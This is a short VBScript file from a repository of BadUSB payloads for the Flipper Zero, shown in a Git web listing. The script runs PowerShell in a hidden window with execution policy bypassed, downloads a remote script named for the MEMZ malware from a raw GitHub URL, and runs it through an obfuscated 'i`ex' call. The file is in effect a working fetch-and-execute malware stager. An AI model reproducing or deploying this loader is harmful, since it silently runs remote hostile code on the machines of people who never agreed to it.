Files
BadUSB-Files-For-FlipperZero/MEMZ-In-Powershell/memz.vbs
2024-05-30 21:26:03 +00:00

5 lines
246 B
Plaintext

Set WshShell = WScript.CreateObject("WScript.Shell")
WScript.Sleep 200
WshShell.Run "powershell.exe -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/MEMZ-In-Powershell/main.ps1 | i`ex", 0, True